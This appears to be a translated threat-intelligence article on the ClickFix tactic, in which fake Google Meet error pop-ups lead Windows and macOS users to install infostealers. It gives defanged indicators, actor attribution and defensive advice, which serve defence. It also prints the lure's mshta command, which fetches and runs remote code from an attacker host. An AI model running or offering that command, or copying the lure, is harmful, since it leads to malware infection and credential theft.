The ClickFix technique is a new level of phishing on the Google Meet platform

12 November 2024 12 minutes Author: Cyber Witcher

Learn how ClickFix, a modern social engineering tactic, uses fake Google Meet video conferencing pages to spread malware among Windows and macOS users. We reveal the details of ClickFix attacks, which attackers use via fake error messages to trick users.

Context

In May 2024, a new social engineering tactic called ClickFix was discovered associated with the ClearFake cluster closely monitored by the Sekoia Threat Detection & Research (TDR) team in private FLINT Report 2024-027. This new variant of ClearFake uses PowerShell and the clipboard to infect systems. The tactic involves displaying fake error messages in browsers to trick users into copying and running malicious PowerShell code, which eventually infects their devices.

According to Proofpoint researchers, who called the tactic ClickFix, the initial access broker TA571 has been using it in phishing campaigns since March 2024. Typically, the campaigns used HTML files disguised as Word documents that displayed a fake error window. This led users to install malware such as Matanbuchus, DarkGate or NetSupport RAT via PowerShell scripts.

In recent months, the ClickFix tactic has been used in numerous campaigns aimed at spreading Windows and macOS infostylers, botnets, and remote access tools. This trend is consistent with malware distribution methods via the so-called “drive-by” download method. Sekoia analysts emphasize that a number of cybercriminal groups have begun to actively use this approach to avoid antivirus scans and browser security measures, which increases the efficiency of infection.

The article provides a timeline of observations of ClickFix campaigns, as well as technical details of a ClickFix cluster that uses fake Google Meet video conference pages to distribute infostylers targeting Windows and macOS. Sekoia analysts have linked this Google Meet-impersonating cluster to two cybercriminal groups: “Slavic Nation Empire (SNE)” and “Scamquerteo”, which are divisions of the cryptocurrency fraud teams “Marko Polo” and “CryptoLove”, respectively.

Chronological overview of ClickFix campaigns

Since June 2024, open source reports and investigations by Sekoia have identified campaigns aimed at distributing malware using the new ClickFix tactic. The following image provides a chronological overview of these campaigns, highlighting the types of malware and their distribution methods, including phishing emails, compromised websites, and dedicated distribution infrastructure.
Figure 1. Overview of malware distribution campaigns using the ClickFix tactic

Here are some examples of malicious websites impersonating Google Chrome, Facebook, PDFSimpli and reCAPTCHA using ClickFix social engineering tactics.

Figure 2. Examples of malicious websites impersonating Google Chrome, Facebook, PDFSimpli, and reCAPTCHA using ClickFix tactics

Victimology of ClickFix clusters

While many ClickFix campaigns aim to broadly target multiple sectors using compromised ClearFake websites and mass phishing attacks, some are specifically targeted at specific industries.

For example, Proofpoint identified ClickFix clusters targeting transportation and logistics companies in North America between May and August 2024. These campaigns used websites that mimicked traffic and fleet management software to achieve a more targeted impact.

In addition, the campaign on the GitHub platform was aimed mostly at developers. It distributed Lumma Stealer through fake vulnerability alerts, exploiting developers’ trust in GitHub notifications. This large-scale operation was likely intended to collect a significant amount of sensitive developer data that could serve as the basis for more targeted attacks in the future.

Recent campaigns identified by Sekoia analysts show a trend toward continuous targeting of both companies and individual users using a variety of recruitment methods, such as fake Google Meet pages and fake Facebook groups.

Fake Google Meet pages and technical issues

Analyzing the text elements in ClickFix messages, such as “Press keyboard shortcut” or “CTRL+V”, revealed several websites masquerading as the main Google Meet video conferencing page. These sites were showing pop-ups falsely reporting problems with the microphone or headset, as shown in the following image.

Figure 3. Fake Google Meet video conference home page with pop-up window simulating technical issues (ClickFix)

A list of domain names and IP addresses that are highly likely to be associated with this cluster has been identified:

meet[.]google[.]us-join[.]com
meet[.]googie[.]com-join[.]us
meet[.]google[.]com-join[.]us
meet[.]google[.]web-join[.]com
meet[.]google[.]webjoining[.]com
meet[.]google[.]cdm-join[.]us
meet[.]google[.]us07host[.]com
googiedrivers[.]com

77.221.157[.]170

Phishing URLs impersonate legitimate ones with the same pattern for the meeting ID, such as:

hxxps://meet[.]google[.]com-join[.]us/wmq-qcdn-orj
hxxps://meet[.]google[.]us-join[.]com/ywk-batf-sfh
hxxps://meet[.]google[.]us07host[.]com/coc-btru-ays
hxxps://meet[.]google[.]webjoining[.]com/exw-jfaj-hpa

Windows users are targeted by Stealc and Rhadamanthys

For Windows users, clicking the “Try to fix” button copies the following command to the clipboard:

mshta hxxps://googIedrivers[.]com/fix-error
The debug file (SHA256: 92a8cc4e385f170db300de8d423686eeeec72a32475a9356d967bee9e3453138) is an HTML file containing an HTML application (HTA) with obfuscated VBScript code. Deobfuscation was performed using a Python script, resulting in the following VBScript:
Figure 4. Deobfuscated VBS script distributed by Google’s fake meeting cluster

After executing the script, VBS performs the following actions:

  1. It terminates its parent process (mshta.exe).

  2. It downloads two executables (stealc.exe and ram.exe) using bitsadmin. After a two-second delay, it notifies the C2 server (webapizmland[.]com) of the success or failure of the executables.

  3. It obtains the public IP address of the victim using the api.ipify[.]org service and sends it to the C2 server along with the execution status.

Two executables, stealc.exe (SHA256: a834be6d2bec10f39019606451b507742b7e87ac8d19dc0643ae58df183f773c) and ram.exe (SHA256: 2853a61188b4446be57543858adcc704e8534326 d4d84ac44a60743b1a44cbfe), are Stealc and Rhadamanthys payloads respectively. Both files are protected by HijackLoader encryption.

In this campaign, the Stealc control server (C2) is located at “hxxp://95.182.97[.]58/84b7b6f977dd1c65.php” and the Rhadamanthys control server (C2) is located at “hxxp://91.103.140[.] 200:9078/3936a074a2f65761a5eb8/6fmfpmi7.fwf4p”. Both IP addresses are already listed in the CTI database as a result of Sekoia.io C2 Trackers monitoring, as we actively monitor the control infrastructure (C2) for these two families of infostylers that are distributed in a malware-as-a-service model.

Notably, the name of the Stealc botnet, “sneprivate24”, indicates an association with the “Slavic Nation Empire (SNE)” traffer group. Additional details about this relationship are presented in the “Forwarder teams that manage this ClickFix cluster” section.

MacOS users are targeted by AMOS Stealer

For macOS users, clicking the “Try Fix” button triggers the download of Launcher_v1.94.dmg (SHA256: 94379fa0a97cc2ecd8d5514d0b46c65b0d46ff9bb8d5a4a29cf55a473da550d5) using the following HTTP requests:

  1. A GET request to hxxps://carolinejuskus[.]com/kusaka.php?call=launcher where the server responds with the second URL in the Location HTTP header.

  2. A GET request to hxxps://carolinejuskus[.]com/f9dfbcf6a999/7cc2f5dc3c76/load.51f8527e20dcb05ffd8586b853937a8a.php?call=launcher which returns a malicious payload.

The Launcher_v1.94.dmg payload (SHA256: 94379fa0a97cc2ecd8d5514d0b46c65b0d46ff9bb8d5a4a29cf55a473da550d5) has been identified as AMOS Stealer interacting with its management server (C2) at “hxxp://85.209.11[.]155/joinsystem”.

Sekoia actively monitors this infrastructure, particularly the /kusaka.php endpoint. Since May 2024, this endpoint has been used in campaigns where users are redirected from malicious websites to download AMOS Stealer. The endpoint is likely used to protect the payload from unwanted traffic, such as automated downloads by bots or scanning by anti-virus products.

The following domain names associated with this macOS malware distribution infrastructure have been identified:

alienmanfc6[.]com
apunanwu[.]com
bowerchalke[.]com
carolinejuskus[.]com
cautrucanhtuan[.]com
cphoops[.]com
dekhke[.]com
iloanshop[.]com
kansaskollection[.]com
lirelasuisse[.]com
mdalies[.]com
mensadvancega[.]com
mishapagerealty[.]com
modoodeul[.]com
pabloarruda[.]com
pakoyayinlari[.]com
patrickcateman[.]com
phperl[.]com
stonance[.]com
utv4fun[.]com

Given the variety of malicious websites that redirect to this infrastructure, there is a high probability that it is used by multiple threat actors. They appear to be organized into a centralized data team that collaborates to share resources, including infrastructure and AMOS Stealer, which is also sold on a malware-as-a-service model.

Traffers teams managing this ClickFix cluster

  • Slavic Nation Empire (SNE) – subgroup of Marco Polo

The attacker’s server contains an interesting JavaScript code at hxxp://77.221.157[.]170:3004/server.js related to this distribution infrastructure. This JavaScript connects to the MongoDB database to retrieve information about the “worker” and sends statistics to two Telegram bots in cases where users visit fake Google Meet websites and successfully download the payload. The team is grateful to cybersecurity researcher Karol Paciorek of the KNF CSIRT for helping with this discovery.

Below is a JavaScript snippet that demonstrates a message being sent to two Telegram bots:

Figure 5: Snippet of attacker’s server code that steals data for Telegram bots used by the ClickFix “fake Google meetups” cluster

Attackers use the server to track compromises and visits related to the ClickFix cluster. Extracted chat logs of Telegram bots “#SNE | GMEET OTSTUK’ via the Telegram API discovered a discussion between sparkhash, the alleged developer of this ClickFix cluster, and trafer Alexmen. The investigation revealed that both are members of the Slavic Nation Empire (SNE) scammer group, which is a sub-group of the Marko Polo cryptocurrency fraud team.

Figure 6. Excerpt of a Telegram bot discussion between the alleged operator and a possible affiliate of the fake Google Meet pages cluster

Cybercriminals often use Telegram bots to monitor their activities, especially when it involves teamwork and collaboration with affiliates (traders/workers).

Based on the analysis of the activity of this cluster and the messages that are transmitted between the threat actors who operate and use it, Sekoia analysts put forward the following hypothesis:

  1. The sparkhash attacker deployed the GMeet cluster in favor of the “Slavic Nation Empire (SNE)” relay team responsible for generating traffic to the cluster.

  2. This disseminator team could be managed by the Alexmen threat actor, which monitors the distribution cluster activities and possibly manages the disseminator licenses by relying on external services.

  3. Referrals, also known as affiliates or workers, distribute malicious URLs to potential victims by redirecting them to this cluster. For example, a cybercriminal called web3huntereth was able to infect a victim or himself during a test in Poland, as indicated by the download statistics of the Telegram bot.

TDR confidently associates this Google Meet-mimicking cluster with the Slavic Nation Empire (SNE) broadcast team, also known as Slavice Nation Land. This group provides its members with a comprehensive set of tools to carry out sophisticated fraudulent activities targeting users of cryptocurrencies, Web3 applications, decentralized finance and NFTs. The package includes landing pages that mimic video conferencing software and web pages, as well as infostylers, money drainers, and automated attack coordination tools.

Slavic Nation Empire (SNE) is a subgroup of the Marko Polo cryptocurrency fraud team and part of the Russian-speaking cybercriminal ecosystem. Credit goes to cyber security researcher g0njxa for valuable information on these groups. Recorded Future researchers also published two reports detailing Marko Polo’s activities.

Scamquerteo Team: Subgroup of CryptoLove

The Scamquerteo distribution team was also found to be using the ClickFix cluster by impersonating Google Meet, specifically under the guise of the FQDN “met[.]google[.]webjoining[.]com” to distribute the malware. Scamquerteo Team is a subgroup of the CryptoLove cryptocurrency scam team and also belongs to the Russian-speaking cybercrime ecosystem.

During the investigation, it was possible to interact with the Telegram bot that manages the traffic activity for this fake Google Meet cluster, as shown in the image below.

Figure 7. Interaction with the Scamquerteo Telegram bot to create a fake Google Meet page

Both teams of cheaters, “Slavic Nation Empire (SNE)” and “Scamquerteo”, use the same ClickFix template that mimics Google Meet. This discovery suggests that these teams are exchanging materials, also known as “landing project”, as well as infrastructure.

Sekoia analysts estimate with medium confidence that both teams are using the same cybercrime service to provide them with this fake Google Meet cluster, which remains unknown at the time of writing. In addition, it is likely that a third party manages their infrastructure or registers their domain names.

Conclusion

ClickFix is ​​a new social engineering tactic first reported in 2024. As of September 2024, several intrusions have already used this tactic to distribute malware at scale via phishing emails, compromised websites, and other distribution infrastructures.

ClickFix misleads users into downloading and running malware on their devices without having to use a web browser to manually download or execute the file. This allows you to bypass browser security features such as Google Safe Browsing and appear less suspicious to users, including corporate and individual users.

The analyzed ClickFix cluster uses a decoy that can be particularly disruptive in campaigns targeting organizations using Google Workspace, especially Google Meet. An investigation of the traffers spreading this cluster revealed that the main targets are users of crypto-assets, Web3 applications, decentralized finance and NFTs. It is believed that similar methods of social engineering can be used in other campaigns to spread malicious software.

1. General rules of cyber hygiene:
– Check URLs: Always pay attention to the website address. Official Google domains always end in .google.com. For example: meet.google.com, not google.web-join.com.
– Do not copy codes from suspicious sites: No reputable service will ask you to copy and run code in PowerShell or in the terminal.
– Ignore pop-up messages: If you see a pop-up message with an error you didn’t expect, close your browser and scan your system for malware.

2. Use of technical means of protection:
– Protection against malicious software:
– Disable automatic execution of scripts such as PowerShell for unknown sources.
– Enable anti-phishing protection in browsers, such as Google Safe Browsing.

3. Recognizing signs of social engineering:
– Checking messages:
– If the system displays an unusual error, do not take action until you check its authenticity on the official website of the service.
– Analysis of logic:
– Legitimate services will not offer to “fix the problem” by offering to run a file or command without explanation.

4. Protection at the level of organizations:
– Employee Training: Develop an employee training program that includes recognizing phishing attacks and social engineering techniques.
– Network monitoring:
– Install threat detection systems (IDS/IPS) that can block suspicious domains.
– Monitor infrastructure for unusual activity.

Disclaimer

This article is created with the sole purpose of raising awareness of fraudulent practices and providing readers with the tools to protect themselves.

Other related articles
Found an error?
If you find an error, take a screenshot and send it to the bot.